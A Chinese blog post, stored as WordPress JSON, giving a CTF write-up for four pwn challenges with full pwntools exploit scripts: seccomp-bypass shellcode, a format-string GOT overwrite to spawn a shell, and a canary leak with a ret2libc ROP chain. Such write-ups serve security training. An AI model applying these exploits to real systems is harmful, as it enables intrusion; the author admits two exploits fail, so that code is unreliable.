{"id":483,"date":"2024-12-15T22:41:25","date_gmt":"2024-12-15T14:41:25","guid":{"rendered":"http:\/\/8.141.27.105\/?p=483"},"modified":"2024-12-15T22:41:25","modified_gmt":"2024-12-15T14:41:25","slug":"%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/","title":{"rendered":"\u7b2c\u4e8c\u5c4aCN-fnst::CTF PWN\u90e8\u5206WP"},"content":{"rendered":"\n<p>\u56db\u9053\u9898\uff0c\u5176\u4e2d\u540e\u4e24\u9053exp\u611f\u89c9\u6ca1\u4ec0\u4e48\u6bdb\u75c5\uff0c\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u601d\u8def\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u4e00\u8d77\u5199\u8fd9\u4e86\u3002<\/p>\n\n\n\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 
.5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#real_signin\" title=\"real_signin\">real_signin<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#sandbox\" title=\"sandbox\">sandbox<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#ez_fmt\" title=\"ez_fmt\">ez_fmt<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/15\/%e7%ac%ac%e4%ba%8c%e5%b1%8acn-fnstctf-pwn%e9%83%a8%e5%88%86wp\/#signin\" title=\"signin\">signin<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"real_signin\"><\/span>real_signin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u7b7e\u5230\u9898\uff0c\u7ed5\u8fc7\u8fc7\u6ee4\u547d\u4ee4\u6267\u884c\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/HOV7Y1RV@105OA8C.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"859\" height=\"742\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/HOV7Y1RV@105OA8C.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-484\"  sizes=\"auto, (max-width: 859px) 100vw, 859px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5b98\u65b9WP\u662fs\\h\uff0c\u6211\u7528\u7684set -s<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K1JP095XAQWSA7_IP92Q.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"316\" height=\"180\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K1JP095XAQWSA7_IP92Q.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-485\"  sizes=\"auto, (max-width: 316px) 100vw, 316px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"sandbox\"><\/span>sandbox<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u6267\u884cshellcode\uff0c\u6709\u6c99\u7bb1\u8fc7\u6ee4\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/XSCF1@0QBQK7J0_8.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1011\" height=\"523\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/XSCF1@0QBQK7J0_8.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-486\"  sizes=\"auto, (max-width: 1011px) 100vw, 1011px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fc7\u6ee4\u4e86execve\u3001read\u3001write\u3001open\uff0c\u4f46\u662f\u6ca1\u4e8b\uff0c\u6709openat+sendfile<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/VH4VC1JVK5N2K8XLA1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"608\" height=\"273\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/VH4VC1JVK5N2K8XLA1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-487\"  sizes=\"auto, (max-width: 608px) 100vw, 608px\" \/><\/div><\/figure>\n\n\n\n<p>payload\uff1a<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>payload=asm(shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u7559\u610f\u5230\u8fd9\u4e00\u884c:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R0THFMH6APQRY@B.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"909\" height=\"392\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/R0THFMH6APQRY@B.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-488\"  sizes=\"auto, (max-width: 909px) 100vw, 909px\" \/><\/div><\/figure>\n\n\n\n<p>沙箱要求第一个syscall的调用号为0xffffffff（即-1，不对应任何真实系统调用，通常只会得到-ENOSYS，不影响后续流程），于是在shellcode最前面先补一次这样的调用，payload变为（注意其中shellcraft.sendfile(1,3,0,100)把openat返回的fd写死成3，这假定进程除0\/1\/2外没有别的已打开描述符；更稳妥的做法是直接把openat返回的rax作为in_fd，即shellcraft.sendfile(1,'rax',0,100)；另外-100是AT_FDCWD，\"flag\"按当前工作目录解析，远程flag不在cwd时要换成绝对路径）：<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>asm('''mov rax,0xffffffff; syscall'''+shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))\n<\/code><\/pre>\n\n\n\n<p>\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<div class=\"wp-block-group is-nowrap is-layout-flex wp-container-core-group-is-layout-ad2f72ca wp-block-group-is-layout-flex\">\n<pre class=\"wp-block-code\"><code>\nfrom pwn import *\n\nfrom ae64 import AE64\ncontext(arch='amd64',os='linux')\ncontext.log_level = 'debug'\n#p=remote('ctf.mardle.cn',34854)\np=process('\/home\/monke\/PWN\/CNCTF\/sandbox\/sandbox')\n\np.recvuntil('shellcode: \\n')\npayload=asm('''mov rax,0xffffffff; 
syscall'''+shellcraft.openat(-100,\"flag\")+shellcraft.sendfile(1,3,0,100)+shellcraft.exit(0))\n\np.sendline(payload)\nprint(p.recvall())\np.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"187\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-491\"  sizes=\"auto, (max-width: 643px) 100vw, 643px\" \/><\/div><\/figure>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"187\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/K2VK0S9EV3_BPJRP5C-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-492\"  sizes=\"auto, (max-width: 643px) 100vw, 643px\" \/><\/div><\/figure>\n\n\n\n<pre 
class=\"wp-block-code\"><code><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"ez_fmt\"><\/span>ez_fmt<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/17ONO4ZOMSNMX62UY37.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"940\" height=\"375\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/17ONO4ZOMSNMX62UY37.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-493\"  sizes=\"auto, (max-width: 940px) 100vw, 940px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u4e0a\u56fe\uff0c\u9898\u76ee\u4e00\u5f00\u59cb\u4f1a\u628aread\u51fd\u6570\u5730\u5740\uff08\u771f\u5b9e\u5730\u5740\uff09\u6253\u51fa\u6765\uff0c\u7136\u540e\u6709\u4e00\u4e2aread\u4e00\u4e2aprintf\uff0c\u6ce8\u610f\u6700\u540e\u9898\u76ee\u4e0d\u662f\u6b63\u5e38return\u800c\u662fexit(0)\u3002<\/p>\n\n\n\n<p>思路是利用题目泄露的read真实地址算出libc里system的地址，然后第一次格式化字符串先把GOT中exit的表项覆写为main（这样每次exit(0)都会重新回到main，可以反复利用），第二次把printf的GOT表项覆写为system，第三次输入\/bin\/sh\\x00时printf(\"\/bin\/sh\")实际执行的就是system(\"\/bin\/sh\")，拿到shell。但要注意下面exp里第二次写入用的是elf.sym[\"system\"]，而不是上面用LibcSearcher算出来的system变量：elf.sym[\"system\"]只有在二进制自身导入了system时才存在（那时它是PLT桩地址，写进去也能用），否则会直接KeyError；而算好的libc里的system地址始终没有用上，这很可能就是本题打不通的原因，应改成fmtstr_payload(8,{elf.got[\"printf\"]:system})。另外向GOT写入完整8字节libc地址时fmtstr_payload默认按字节拆写、payload较长，要确认题目read的长度足够装下。<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\nfrom pwn import *\nfrom LibcSearcher import *\n\ncontext.log_level = 'debug'\n\np = 
process('\/home\/monke\/PWN\/CNCTF\/fmt\/ez_fmt')\n#p = remote('ctf.mardle.cn', 33992)\nelf = ELF('\/home\/monke\/PWN\/CNCTF\/fmt\/ez_fmt')\npop_rdi=0x400783 \n\np.recvuntil(\"you: \")\nread=p.recv(14)\nprint(read)\nread=int(read,16)\n#print(hex(elf.got&#91;\"read\"]))\n#print(elf.sym&#91;\"main\"])\n\n\nlibc=LibcSearcher(\"read\",read)\nlibcbase=read-libc.dump('read')\nsystem=libcbase+libc.dump('system')\n\n\n\npayload=fmtstr_payload(8,{elf.got&#91;\"exit\"] :elf.sym&#91;\"main\"]})\np.sendlineafter(\"ng: \\n\",payload)\n#test\n#payload=b\"%9$sAAAA\" + p64(elf.got&#91;\"puts\"])\n#p.sendlineafter(\"ng: \\n\",payload)\n#puts = u64(p.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))\n#print(hex(puts))\npayload=fmtstr_payload(8,{elf.got&#91;\"printf\"] :elf.sym&#91;\"system\"]})\np.sendlineafter(\"ng: \\n\",payload)\np.sendline(\"\/bin\/sh\\x00\")\n\np.interactive()\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"signin\"><\/span>signin<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/CYBPRV5BINA71YKEQ7VU.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"851\" height=\"487\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/CYBPRV5BINA71YKEQ7VU.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-494\"  sizes=\"auto, (max-width: 851px) 100vw, 851px\" 
\/><\/div><\/figure>\n\n\n\n<p>第一个read+puts泄露canary，然后打ret2libc。值得一提的是泄露puts地址的写法：puts = u64(p.recvuntil('\\x7f')[-6:].ljust(8,b'\\x00')) 依赖地址的最高字节恰好是0x7f（这取决于内核mmap\/ASLR的布局，并不是由libc版本决定），而且输出里若提前出现一个0x7f字节就会截错，所以确实不宜依赖。但直接改成 puts =u64(p.recv(7).ljust(8, b\"\\0\")) 同样有问题：puts只会打印到地址里第一个\\x00为止（0x7f...地址只有6个有效字节），然后再补一个换行，recv(7)会把这个0x0a一并收进来，落在地址的第48~55位上，libcbase随之算错，后面的system和binsh自然打不通。应当用 puts = u64(p.recv(6).ljust(8, b'\\0'))，并在喂给LibcSearcher之前print(hex(puts))核对它是合理的0x7f...形式（若程序在ROP链触发前还有其他输出，先recvuntil把它吃掉再收这6个字节）。<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\nfrom LibcSearcher import *\ncontext(arch=\"amd64\", os=\"linux\", log_level=\"debug\")\n\n# Load the ELF file and execute it as a new process.\n\n#lddp=remote(\"ctf.mardle.cn\",34887)\np = process(\"\/home\/monke\/PWN\/CNCTF\/signin\/signin\")\nelf=ELF(\"\/home\/monke\/PWN\/CNCTF\/signin\/signin\")\n\npop_rdi = 0x40071e\nret=0x400596\n\n#gdb.attach(p)\n#\u5229\u7528printf\u6ca1\u8bfb\u5230\\0\u4e0d\u622a\u65ad\u7684\u7279\u70b9\uff0c\u6cc4\u9732canary\np.sendlineafter(\" name: \",b'a')\n\npayload1=b'a'*23+b'b'\np.sendlineafter('yourself: ',payload1)\n\np.recvuntil(b'b')\ncanary=u64(p.recv(8))-0xa\n\n#leak\npayload = cyclic(24)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(elf.got&#91;\"puts\"])+p64(elf.plt&#91;\"puts\"])+p64(elf.sym&#91;\"main\"])\n\np.sendlineafter('Say something: ',payload)\n#puts = u64(p.recvuntil('\\x7f')&#91;-6:].ljust(8,b'\\x00'))\nputs =u64(p.recv(7).ljust(8, b\"\\0\"))\nprint('puts='+hex(puts))\n\n\nlibc=LibcSearcher(\"puts\",puts)\nlibcbase=puts-libc.dump('puts')\nsystem=libcbase+libc.dump('system')\nbinsh=libcbase+libc.dump('str_bin_sh')\nprint(hex(system))\nprint(hex(binsh))\n\nprint(hex(canary))\n\npayload = cyclic(24)+p64(canary)+p64(0)+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)\n\n\np.sendlineafter(\" name: \",b'a')\np.sendlineafter('yourself: ',b'a')\np.sendlineafter('Say something: 
',payload)\n#gdb.attach(p)\np.interactive()\n<\/code><\/pre>\n\n\n\n<p>\u540e\u4e24\u9898\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u4e5f\u6ca1\u4ec0\u4e48\u4e0d\u5bf9\u52b2\u7684\uff0c\u5982\u679c\u53d1\u73b0\u9519\u8bef\u4e4b\u5904\u52b3\u8bf7\u5e08\u5085\u4eec\u5728\u8bc4\u8bba\u533a\u6307\u6b63\uff0c\u611f\u6fc0\u4e0d\u5c3d\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u56db\u9053\u9898\uff0c\u5176\u4e2d\u540e\u4e24\u9053exp\u611f\u89c9\u6ca1\u4ec0\u4e48\u6bdb\u75c5\uff0c\u4f46\u662f\u6253\u4e0d\u901a\uff0c\u770b\u4e86\u5b98\u65b9wp\u611f\u89c9\u601d\u8def\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u4e00\u8d77\u5199\u8fd9\u4e86\u3002 real_s [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-483","post","type-post","status-publish","format-standard","hentry","category-game"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=483"}],"version-history":[{"count":3,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions"}],"predecessor-version":[{"id":495,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/483\/revisions\/495"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=483"},{"taxonomy":"post_tag","embeddable":true,"hr
ef":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}